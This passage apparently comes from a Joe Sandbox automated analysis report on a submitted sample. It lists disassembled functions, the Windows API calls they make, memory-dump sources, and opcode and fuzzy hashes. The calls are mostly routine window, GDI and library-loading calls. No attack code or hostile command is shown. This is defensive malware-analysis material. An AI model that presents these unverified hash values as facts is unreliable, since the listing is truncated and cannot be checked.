                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                                • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                • API String ID: 142928637-2676053874
                                                                                • Opcode ID: d06cc84e9d2e4e0b448c748badd712702b96776d6b0267aa2fd44745f5a2b4d6
                                                                                • Instruction ID: 2c8c4e1fda890c3dedf4e0e73620de090a3a9d5666271f16a874a7bcdd66483b
                                                                                • Opcode Fuzzy Hash: d06cc84e9d2e4e0b448c748badd712702b96776d6b0267aa2fd44745f5a2b4d6
                                                                                • Instruction Fuzzy Hash: 52E092A1741720EAEA10B7B67CC6F9A2668E714729F54403BF100A51E1C3BD1C80CE9E
                                                                                Function 0044C7EC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F099), ref: 0044C7FB
                                                                                • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C80C
                                                                                • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C81C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                • API String ID: 2238633743-1050967733
                                                                                • Opcode ID: c58342e6ebd42d3e550f5fa79659fa064c9032f03f8e913941057cc824ddc2bd
                                                                                • Instruction ID: d5a6e329c062b47ae4ba9e11e7719f1ec1b45dd3e70fac445fdcae0b1af11dcb
                                                                                • Opcode Fuzzy Hash: c58342e6ebd42d3e550f5fa79659fa064c9032f03f8e913941057cc824ddc2bd
                                                                                • Instruction Fuzzy Hash: 64F0FE70246305CAFB50BBB5FDC67223694E3A4B0AF18137BE40156192D7BC4444CF4C
                                                                                Function 00478B3C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 14libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,004985F4), ref: 00478B42
                                                                                • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478B4F
                                                                                • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478B5F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule
                                                                                • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                • API String ID: 667068680-222143506
                                                                                • Opcode ID: dff5fcaa570554af533fa68d6d4d47fa30ed3b2efb34bda6c6df081b9be12d17
                                                                                • Instruction ID: 8ade474bf949b7c868f23be577f60042bf37b8b7e1302e6d2b868e4e2d48ad49
                                                                                • Opcode Fuzzy Hash: dff5fcaa570554af533fa68d6d4d47fa30ed3b2efb34bda6c6df081b9be12d17
                                                                                • Instruction Fuzzy Hash: D4C0E9F0AC1740EEAA00E7F15CDAD762558D514B34724943F754DAA193D97D58044A2C
                                                                                Function 0041B518 Relevance: 9.1, APIs: 6, Instructions: 113windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFocus.USER32 ref: 0041B58E
                                                                                • 73E9A570.USER32(?,00000000,0041B668,?,?,?,?), ref: 0041B59A
                                                                                • 73EA4620.GDI32(?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5B6
                                                                                • 73ECE680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5D3
                                                                                • 73ECE680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668), ref: 0041B5EA
                                                                                • 73E9A480.USER32(?,?,0041B643,?,?), ref: 0041B636
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: E680$A4620A480A570Focus
                                                                                • String ID:
                                                                                • API String ID: 2226671993-0
                                                                                • Opcode ID: 5d7c3ba993e5eebd83af6d17b2c287e498e3d287d4e0c623dc28ca4d995b2802
                                                                                • Instruction ID: 7d41d09f6123fe0998bcf531a8d6f09bc5b1e179d78523dd82c4b1b978091a2c
                                                                                • Opcode Fuzzy Hash: 5d7c3ba993e5eebd83af6d17b2c287e498e3d287d4e0c623dc28ca4d995b2802
                                                                                • Instruction Fuzzy Hash: 7E41D571A04254AFDB10DFA9C886EAFBBB4EB55704F1484AAF500EB351D3389D11CBA5
                                                                                Function 0045D3B0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetLastError.KERNEL32(00000057,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D41B
                                                                                • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D4E8,?,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D45A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                • API String ID: 1452528299-1580325520
                                                                                • Opcode ID: 4cfdc77ab01fb36c91946a35bece077a72b39e520f3a0bad4193af408e0f5770
                                                                                • Instruction ID: bfdb5615fdc952ab51c5d4d36cfcdc52ba3649a349ed7733e19bd606ff263fd4
                                                                                • Opcode Fuzzy Hash: 4cfdc77ab01fb36c91946a35bece077a72b39e520f3a0bad4193af408e0f5770
                                                                                • Instruction Fuzzy Hash: A6117835A04204ABD731DE95C941A5E76DCDF46306F608077AD0596283D67C6F0A952A
                                                                                Function 0041BD9C Relevance: 9.1, APIs: 6, Instructions: 71COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSystemMetrics.USER32(0000000B), ref: 0041BDE5
                                                                                • GetSystemMetrics.USER32(0000000C), ref: 0041BDEF
                                                                                • 73E9A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDF9
                                                                                • 73EA4620.GDI32(00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE20
                                                                                • 73EA4620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE2D
                                                                                • 73E9A480.USER32(00000000,00000000,0041BE73,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE66
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: A4620MetricsSystem$A480A570
                                                                                • String ID:
                                                                                • API String ID: 4120540252-0
                                                                                • Opcode ID: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                                • Instruction ID: cee0947e7f2791638d7e7c91bd9cc57ffb528c4a132e606019bcc307a049f0f1
                                                                                • Opcode Fuzzy Hash: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                                • Instruction Fuzzy Hash: 40212C74E046499FEB00EFA9C982BEEB7B4EB48714F10842AF514B7781D7785940CBA9
                                                                                Function 0047E264 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 0047E272
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CFF1), ref: 0047E298
                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 0047E2A8
                                                                                • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E2C9
                                                                                • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E2DD
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E2F9
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long$Show
                                                                                • String ID:
                                                                                • API String ID: 3609083571-0
                                                                                • Opcode ID: f65d960a6ef7549d8abdb9e067b5e5f1b226f2d151c0a96430342ef03e516e78
                                                                                • Instruction ID: 64a3e6c2176d4acc74ea6130292171d5cd043058eec335b926c35577e1896bc6
                                                                                • Opcode Fuzzy Hash: f65d960a6ef7549d8abdb9e067b5e5f1b226f2d151c0a96430342ef03e516e78
                                                                                • Instruction Fuzzy Hash: DE010CB5651210ABE600D769DE41F66379CAB0D334F0503AAB959DF2E3C729EC009B49
                                                                                Function 0041B280 Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0041A6F0: CreateBrushIndirect.GDI32 ref: 0041A75B
                                                                                • UnrealizeObject.GDI32(00000000), ref: 0041B28C
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041B29E
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0041B2C1
                                                                                • SetBkMode.GDI32(?,00000002), ref: 0041B2CC
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0041B2E7
                                                                                • SetBkMode.GDI32(?,00000001), ref: 0041B2F2
                                                                                  • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                • String ID:
                                                                                • API String ID: 3527656728-0
                                                                                • Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                                • Instruction ID: 5f3c9a08814bcb0dec11b684bd4148c9aa8da507e688bf70d4fc6563dceee2e6
                                                                                • Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                                • Instruction Fuzzy Hash: 7EF0C2B1651501ABCE00FFBAD9CAE4B37A89F043097088057B544DF197C97CD8548B3D
                                                                                Function 0049772C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 97COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                • ShowWindow.USER32(?,00000005,00000000,00497991,?,?,00000000), ref: 00497762
                                                                                  • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                  • Part of subcall function 004072B0: SetCurrentDirectoryA.KERNEL32(00000000,?,0049778A,00000000,0049795D,?,?,00000005,00000000,00497991,?,?,00000000), ref: 004072BB
                                                                                  • Part of subcall function 0042D45C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4EA,?,?,?,00000001,?,0045606A,00000000,004560D2), ref: 0042D491
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                • String ID: .dat$.msg$IMsg$Uninstall
                                                                                • API String ID: 3312786188-1660910688
                                                                                • Opcode ID: 8060b02bfbd0833a98a3e6243afb85b8b494b7fa2efbfb07078fe99f385005b5
                                                                                • Instruction ID: bbf2e7f3574d42a9113524bdb42c94a944b0e97273f2a70b882bd080beededf8
                                                                                • Opcode Fuzzy Hash: 8060b02bfbd0833a98a3e6243afb85b8b494b7fa2efbfb07078fe99f385005b5
                                                                                • Instruction Fuzzy Hash: 8E318F74A10214AFDB00EF65DC82D6E7BB5EB89318B51847AF800AB392D739BD01CB58
                                                                                Function 0042EAB8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EAEA
                                                                                • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAF0
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB19
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                • API String ID: 828529508-2866557904
                                                                                • Opcode ID: 915f5369749bf1dd2f4e97bc9020bef18acdf07caf1deb2404a0262322aa2bf8
                                                                                • Instruction ID: f5c55ae169209784706469d1b6e96428d25835975ad7b3a5622eb1d8c2489c6d
                                                                                • Opcode Fuzzy Hash: 915f5369749bf1dd2f4e97bc9020bef18acdf07caf1deb2404a0262322aa2bf8
                                                                                • Instruction Fuzzy Hash: 2DF022E078062136E620E2BFACC3F6B498C8FA0725F040436F009EA2C2E92C9900422E
                                                                                Function 00457E34 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00457E64
                                                                                • GetExitCodeProcess.KERNEL32(?,00498116), ref: 00457E85
                                                                                • CloseHandle.KERNEL32(?,00457EB8,?,?,004586D3,00000000,00000000), ref: 00457EAB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                • API String ID: 2573145106-3235461205
                                                                                • Opcode ID: 575e6b60f34cbf4eff7e6cad29998e42f3eca010a17ab32e5b4d53f7e3c6a35f
                                                                                • Instruction ID: 6a931132ee958b8202ab537f65b64b7fb4871f4dbf11571726e28c2ddef09419
                                                                                • Opcode Fuzzy Hash: 575e6b60f34cbf4eff7e6cad29998e42f3eca010a17ab32e5b4d53f7e3c6a35f
                                                                                • Instruction Fuzzy Hash: 1101A735604704AFDB11EB999D43A1E77A8DB49711F5004B6FC10E73D3D63C9D048618
                                                                                Function 0042E9BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA80,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9D2
                                                                                • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9D8
                                                                                • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9E9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                • API String ID: 3478007392-2498399450
                                                                                • Opcode ID: 9d5cf1aadbd407eeb031432e352e4554899be5068d45876e9cc0d059751b9763
                                                                                • Instruction ID: 5ef4959e42d5312267b3952f4de6be483a2b5690063b138e9708ef51bd19b1c3
                                                                                • Opcode Fuzzy Hash: 9d5cf1aadbd407eeb031432e352e4554899be5068d45876e9cc0d059751b9763
                                                                                • Instruction Fuzzy Hash: A3E0ECB1741314EADA106B62BECBF5A2558E724B15F54043BF101751F2C7BD2C80C95E
                                                                                Function 00477AB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 00477AB8
                                                                                • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477BAF,0049C0A4,00000000), ref: 00477ACB
                                                                                • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477AD1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                • String ID: AllowSetForegroundWindow$user32.dll
                                                                                • API String ID: 1782028327-3855017861
                                                                                • Opcode ID: 68b371c1f4cd94bc20bebdce253c565989975d555a3c9a3b5155311c67ca03d8
                                                                                • Instruction ID: 8233eca9c26ae86130ab8a2651ceb45e7b9436c82c984da63702dcb6f06a18e2
                                                                                • Opcode Fuzzy Hash: 68b371c1f4cd94bc20bebdce253c565989975d555a3c9a3b5155311c67ca03d8
                                                                                • Instruction Fuzzy Hash: 27D0A7A0208300A6ED10F3F14C47E6F224C8D847587A4C43B7404E3182CABCE900993C
                                                                                Function 00416C3C Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • BeginPaint.USER32(00000000,?), ref: 00416C62
                                                                                • SaveDC.GDI32(?), ref: 00416C93
                                                                                • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D55), ref: 00416CF4
                                                                                • RestoreDC.GDI32(?,?), ref: 00416D1B
                                                                                • EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                • String ID:
                                                                                • API String ID: 3808407030-0
                                                                                • Opcode ID: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                                • Instruction ID: c70ebf24aed337d2f43398dc79d2f74fb7d9fd2825851e0a0ce007a429ecfdc3
                                                                                • Opcode Fuzzy Hash: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                                • Instruction Fuzzy Hash: D7413C70A04204AFDB04DB99D985FAE77F9EB48304F1640AEE4059B362D778ED85CB58
                                                                                Function 00414810 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
